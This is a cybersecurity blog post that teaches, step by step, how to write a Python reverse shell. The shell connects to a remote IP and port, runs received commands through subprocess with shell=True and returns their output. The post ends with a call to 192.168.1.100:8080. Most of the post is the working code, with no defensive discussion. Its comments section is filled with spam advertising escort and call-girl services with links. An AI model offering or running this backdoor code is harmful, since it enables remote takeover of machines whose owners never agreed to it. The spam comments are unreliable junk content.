top of page

CYBER & INFOSEC

"blogger, InfoSec specialist, super hero ... and all round good guy" 

DISCUSSIONS, CONCEPTS & TECHNOLOGIES FOR THE WORLD OF

JOIN THE DISCUSSION

Search

How to write a reverse shell

  • Writer: Aamir Lakhani
    Aamir Lakhani
  • Oct 31, 2023
  • 2 min read

A reverse shell is a type of network connection in which a remote computer establishes a connection to a local computer and allows the remote computer to execute commands on the local computer. This can be useful in a number of situations, such as when a local computer is behind a firewall and needs to connect to a remote computer, or when a local computer needs to be accessed remotely by a third party.

Here is an example of how to write a simple reverse shell in Python:


First, we will need to import the necessary libraries. In this example, we will use the socket library to create the network connection and the subprocess library to execute commands:



ree

import socket

import subprocess



Next, we will create a function to establish the reverse shell connection. This function will take two arguments: the IP address of the remote computer and the port number that we want to use for the connection:



ree

def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))



Once the connection is established, we can use the subprocess library to execute commands on the local computer. For example, we can use the



subprocess.Popen() function to execute a command and capture the output:




ree

def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))


# Execute a command and capture the output

cmd = s.recv(1024).decode()

output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)



We can then send the output of the command back to the remote computer using the send() function:



ree

def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))


# Execute a command and capture the output

cmd = s.recv(1024).decode()

output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)


# Send the output back to the remote computer

s.send(output.stdout.read())

s.send(output.stderr.read())



Finally, we can call the function and pass in the IP address and port number of the remote computer to establish the reverse shell connection:



ree

reverse_shell('192.168.1.100', 8080)



Okay, lets build on what we know and get a little more complicated by adding some encryption and error checking.



Recent Posts

See All

10 commentaires

Ctbabe In
Ctbabe In
14 août

When you want the best, you come to ctbabe. Our directory is filled with India’s most stunning and genuine call girls, all committed to making your time together perfect. Choose us for elegance, passion, and unforgettable experiences. ctbabe brings you a carefully selected list of companions who can turn your ordinary night into an extraordinary memory. With genuine profiles, clear prices, and respectful service, we make sure you get exactly what you’re looking for — and more.

call girls in Delhi

call girls in Dehradun

call girls in Goa

call girls in Jaipur


J'aime
Ct Lush
Ct Lush
14 août

Ctlush is the fun and easy way to meet gorgeous girls in your city. With our Indian Call Girls Directory, you can pick your location, browse real profiles, and see clear photos with all the details. Just select your city, explore the girls, and choose your favorite. Contact them directly via WhatsApp or call to plan your meet. No stress, no waiting—just quick, friendly, and exciting connections. Ctlush makes finding the perfect girl simple and enjoyable.


Mumbai call girls, Bangalore call girls, Chennai call girls, Hyderabad call girls

J'aime
Sweety patel
Sweety patel
04 août

Imagine opening your door to find Mumbai's most breathtaking beauty waiting just for you. Our Mumbai escorts aren't just companions - they're living fantasies with curves that hypnotize and smiles that melt resistance. These escorts in Mumbai specialize in making powerful men weak in the knees, whether at high-profile events or in the privacy of your luxury suite. Their secret? A combination of elite training and natural sensuality that turns every meeting into an unforgettable experience.


When the sun sets, our Mumbai call girls transform into your personal pleasure architects. These call girls in Mumbai don't just satisfy - they overwhelm your senses with techniques perfected through years of practice. From tantric massages that unravel tension to intimate encounters that…

J'aime
Ct Queen
Ct Queen
02 août

Ctqueen ain’t trying to look perfect, and maybe that’s why it kinda stands out. It’s just simple—go on the site, scroll around, and boom, you get what you came for. No long sign-up stuff, no fake redirects, and barely any annoying ads. Some profiles don’t got full info, and yeah, a few grammar mess-ups here and there, but honestly that kinda makes it feel like it’s made by real people Bhubneswar Call Girls || Patna Call Girls || Vadodara Call Girls || Gurgoan Call Girls

J'aime
Bumrah Fun
Bumrah Fun
25 juil.

Our call girls do not store any of your personal data, Jaipur Call Girls, when you take the service, all your personal data is deleted. https://funnygirl.in/

For Noida region click on  https://noida.funnygirl.in/

J'aime

doctorchaos.com and drchaos.com is a blog dedicated to Cyber Counter Intelligence and Cybersecurity technologies. The posts will be a discussion of concepts and technologies that make up emerging threats and techniques related to Cyber Defense. Sometimes we get a little off-topic. Articles are gathered or written by cyber security professionals, leading OEMs, and enthusiasts from all over the world to bring an in-depth, real-world, look at Cyber Security. About this blog doctorchaos.com and drchaos.com and any affiliate website does not represent or endorse the accuracy or reliability of any information’s, content or advertisements contained on, distributed through, or linked, downloaded or accessed from any of the services contained on this website, nor the quality of any products, information’s or any other material displayed, purchased, or obtained by you as a result of an advertisement or any other information’s or offer in or in connection with the services herein. Everything on this blog is based on personal opinion and should be interoperated as such. Contact Info If you would like to contact this blog, you may do so by emailing ALAKHANI(AT)YMAIL(DOT)COM  

SOCIALS 

Facebook

Twitter

Instagram

Linkedin

RSS Feed

SUBSCRIBE 

Keeping you informed | Latest News

© 2018 Dr. Chaos 

bottom of page